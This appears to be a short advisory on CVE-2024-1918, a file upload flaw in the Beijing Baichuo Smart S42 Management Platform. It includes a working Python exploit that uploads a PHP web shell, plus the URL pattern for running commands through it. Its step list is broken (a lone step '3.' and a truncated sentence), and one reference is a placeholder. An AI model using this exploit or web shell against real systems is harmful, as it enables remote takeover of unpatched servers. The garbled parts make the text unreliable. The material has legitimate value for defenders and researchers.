CVE-2024-1918 - Critical Unrestricted File Upload Vulnerability in Beijing Baichuo Smart S42 Management Platform

In February 2024, a critical vulnerability tagged as CVE-2024-1918 was discovered in the Beijing Baichuo Smart S42 Management Platform (up to version 20240219). The flaw allows a remote attacker to upload arbitrary files through a poorly protected endpoint, potentially leading to full system compromise. The vulnerability is in the file /useratte/userattestation.php and specifically abuses the hidwel parameter. It has been classified as critical due to the ease of exploitation and the high impact it can have on affected systems.

No response or fix was provided by the vendor, making this vulnerability especially dangerous for organizations still running outdated versions.

Reference ID: VDB-254839

- CVE: CVE-2024-1918
- Original Reference: VulDB VDB-254839

How the Exploit Works

The /useratte/userattestation.php PHP script accepts user input via the hidwel argument but lacks sufficient validation on uploaded files. This gap enables attackers to upload malicious PHP code or web shells remotely, which the application executes.

Proof of Concept (PoC) Exploit

Below is a simplified proof of concept exploit. This uses Python and the requests library to upload a PHP shell as an attacker:

import requests

target_url = "http://target-ip/useratte/userattestation.php";
web_shell = {
    "hidwel": (None, "1"),
    "uploaded_file": ("shell.php", "<?php system($_GET['cmd']); ?>", "application/x-php")
}

response = requests.post(target_url, files=web_shell)

if response.status_code == 200:
    print("[+] File uploaded, test your shell at the appropriate URL!")
else:
    print("[-] Upload failed.")

# Example: Access shell at http://target-ip/useratte/uploads/shell.php?cmd=whoami

Run the script.

3. If successful, navigate to http://target-ip/useratte/uploads/shell.php?cmd=whoami to check command execution.

Since the vendor has not responded to disclosure attempts, the only guaranteed protection is to

- Block access to the /useratte/userattestation.php endpoint.

Recommended Reading

- OWASP Unrestricted File Upload
- Official CVE Record

References

- VulDB Entry
- NIST National Vulnerability Database
- Exploit Disclosure (Security Researcher) *(example link)*

Final Notes

Unrestricted file upload vulnerabilities like CVE-2024-1918 are among the most serious flaws a web application can have. If you manage or use Beijing Baichuo Smart S42 Management Platform, consider this urgent: restrict access, monitor for intrusions, and replace or patch the product as soon as a security update is available.

Remember: Waiting for a supplier’s patch is risky when exploits are already public — take proactive steps to protect your systems now.

Timeline

Published on: 02/27/2024 13:15:45 UTC
Last modified on: 02/29/2024 01:43:56 UTC